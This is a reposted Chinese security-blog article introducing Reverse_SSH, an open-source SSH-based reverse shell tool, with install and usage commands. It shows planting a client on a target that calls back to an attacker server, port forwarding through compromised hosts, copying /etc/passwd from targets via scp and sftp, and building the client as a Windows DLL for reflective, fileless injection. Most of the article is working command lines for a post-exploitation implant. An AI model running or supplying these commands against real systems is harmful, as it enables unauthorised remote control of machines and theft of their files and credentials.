Reverse_SSH:一款基于SSH的反向Shell工具

admin
admin
admin
102258
文章
87
评论
2022年11月25日11:11:55评论63 views字数 2302阅读7分40秒阅读模式

Reverse_SSH:一款基于SSH的反向Shell工具


 关于Reverse_SSH 


Reverse_SSH上一款基于SSH的反向Shell工具,在该工具的帮助下,广大研究人员可以使用SSH来实现反向Shell,并同时拥有下列功能:


1、使用原生SSH语句管理和连接反向Shell;


2、动态、本地和远程转发;


3、原生SCP和SFTP实现,用于从目标获取文件;


4、完整功能的Windows Shell;


5、实现了客户端&服务器端身份验证,以创建高信任高可用的控制通道;


6、其他...


 工具架构 


Reverse_SSH:一款基于SSH的反向Shell工具


 工具安装 


Docker安装


docker run -p3232:2222 -e EXTERNAL_ADDRESS=<your_external_address>:3232 -e SEED_AUTHORIZED_KEYS="$(cat ~/.ssh/id_ed25519.pub)" -v data:/data reversessh/reverse_ssh

(向右滑动,查看更多)

手动安装


git clone https://github.com/NHAS/reverse_ssh
cd reverse_ssh
make
cd bin/









运行下列命令后即可启动服务器:





cp ~/.ssh/id_ed25519.pub authorized_keys
./server 0.0.0.0:3232







 工具运行 





将客户端拷贝到目标设备中,然后让客户端连接服务器:



./client your.rssh.server.com:3232






获取工具帮助信息:



ssh your.rssh.server.com -p 3232 help






查看客户端:



ssh your.rssh.server.com -p 3232 ls -t






Reverse_SSH:一款基于SSH的反向Shell工具






连接到完整Shell:







    

  • 



ssh -J your.rssh.server.com:3232 0f6ffecb15d75574e5e955e014e0546f6e2851ac




(向右滑动,查看更多)







或直接使用主机名连接:



ssh -J your.rssh.server.com:3232 root.wombo






接下来,可以开启远程转发功能:







    

  • 



ssh -R 1234:localhost:1234 -J your.rssh.server.com:3232 root.wombo




(向右滑动,查看更多)


或开启动态转发:






    

  • 



ssh -D 9050 -J your.rssh.server.com:3232 root.wombo




(向右滑动,查看更多)




SCP:






    

  • 



scp -J your.rssh.server.com:3232 root.wombo:/etc/passwd .




(向右滑动,查看更多)


SFTP:






    

  • 



sftp -J your.rssh.server.com:3232 root.wombo:/etc/passwd .




(向右滑动,查看更多)





 其他功能 





默认服务器





可以在项目构建的时候指定一个默认服务器:







    

  • 



$ RSSH_HOMESERVER=your.rssh.server.com:3232 make
$ bin/client
$ bin/client example.com:3232







Windows DLL生成





我们还可以将客户端编译成DLL,并使用类似Invoke-ReflectivePEInjection之类的工具进行加载。此时,如果你使用的是Linux系统,可以使用mingw-w64-gcc编译器:




CC=x86_64-w64-mingw32-gcc GOOS=windows RSSH_HOMESERVER=192.168.1.1:2343 make client_dll




(向右滑动,查看更多)





当RSSH服务器启用了Webserver之后,我们也可以使用下列命令进行编译:



./server --webserver :3232
ssh your.rssh.server.com -p 3232
catcher$ link --name windows_dll --shared-object --goos windows
http://your.rssh.server.com:3232/windows_dll




(向右滑动,查看更多)




这种情况适用于无文件注入的场景。





Webhook





RSSH服务器可以通过命令行终端接口并使用webhook命令发送原始HTTP请求。





首先,启用一个webhook:



$ ssh your.rssh.server.com -p 3232
catcher$ webhook --on http://localhost:8080/






接下来,连接客户端,并使用下列格式发送一个POST请求:







    

  • 



$ nc -l -p 8080
POST /rssh_webhook HTTP/1.1
Host: localhost:8080
User-Agent: Go-http-client/1.1
Content-Length: 165
Content-Type: application/json
Accept-Encoding: gzip
 
{"Status":"connected","ID":"ae92b6535a30566cbae122ebb2a5e754dd58f0ca","IP":"[::1]:52608","HostName":"user.computer","Timestamp":"2022-06-12T12:23:40.626775318+12:00"}%




(向右滑动,查看更多)





 项目地址 





Reverse_SSHhttps://github.com/NHAS/reverse_ssh





参考资料:


https://www.instagram.com/smart.hedgehog.art/













Reverse_SSH:一款基于SSH的反向Shell工具





























精彩推荐



















































Reverse_SSH:一款基于SSH的反向Shell工具Reverse_SSH:一款基于SSH的反向Shell工具



Reverse_SSH:一款基于SSH的反向Shell工具



Reverse_SSH:一款基于SSH的反向Shell工具







原文始发于微信公众号(FreeBuf):Reverse_SSH:一款基于SSH的反向Shell工具

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年11月25日11:11:55
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Reverse_SSH:一款基于SSH的反向Shell工具http://cn-sec.com/archives/1422560.html

发表评论

匿名网友 填写信息